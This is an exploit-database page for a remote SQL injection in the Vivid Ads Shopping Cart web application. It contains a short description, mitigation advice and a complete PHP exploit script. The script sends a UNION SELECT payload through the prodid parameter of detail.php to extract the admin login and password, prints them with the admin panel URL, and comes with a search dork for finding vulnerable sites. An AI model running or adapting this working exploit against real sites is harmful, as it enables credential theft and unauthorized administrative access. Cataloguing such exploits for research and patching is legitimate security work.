header-logo
Suggest Exploit
vendor:
Vivid Ads Shopping Cart
by:
Pr0T3cT10n
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vivid Ads Shopping Cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Vivid Ads Shopping Cart (prodid) Remote SQL Injection

This code was written for educational purpose. It is a remote SQL injection vulnerability in Vivid Ads Shopping Cart. It allows an attacker to extract admin details from the database. The dork used for this exploit is 'Vivid Ads Shopping Cart'. The exploit is written in PHP and uses fsockopen to connect to the server and send a GET request to the detail.php page with a malicious payload. The payload is a union select statement that concatenates the login and password of the admin user. The response is then parsed to extract the admin details.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user input should be validated and filtered before being used in a SQL query. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

<?php
# Vivid Ads Shopping Cart (prodid) Remote SQL Injection
# Author: Pr0T3cT10n, pr0t3ct10n[at]gmail[dot]com
# This code was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# Dork: "Vivid Ads Shopping Cart"
# nullbyte.org.il

$site = 'www.example.com'; # Site address
$path = '/path'; # Folder path
$contents = '';
$sock = fsockopen($site, 80, $errno, $errstr, 30);
if(!$sock){
    echo('( ' .$errstr.$errno. ' )'."\n");
}
else{
    $pack = "GET " .$path. "/detail.php?prodid=-1+union+select+1,2,3,concat(char(60),login,char(59),password,char(62)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin HTTP/1.1\r\n";
    $pack.= "Host: " .$site. "\r\n";
    $pack.= "Connection: Close\r\n\r\n";
    if(fwrite($sock, $pack)){
        while(!feof($sock)){
            $contents.= fgets($sock, 4096);
        }
        if(preg_match('/<(.*);(.*)>/', $contents, $matches)){
            echo('User: ' .$matches[1]. ';'."\n".'Pass: ' .$matches[2]. ';'."\n".'Admin login: http://' .$site.$path. '/admin/'."\n");
        }
        else{
            echo('Can\'t pull out admin details.'."\n");
        }
    }
    else{
        echo('Can\'t write socket.'."\n");
    }
}
?>

Navigation

Suggest Exploit

Services By CQR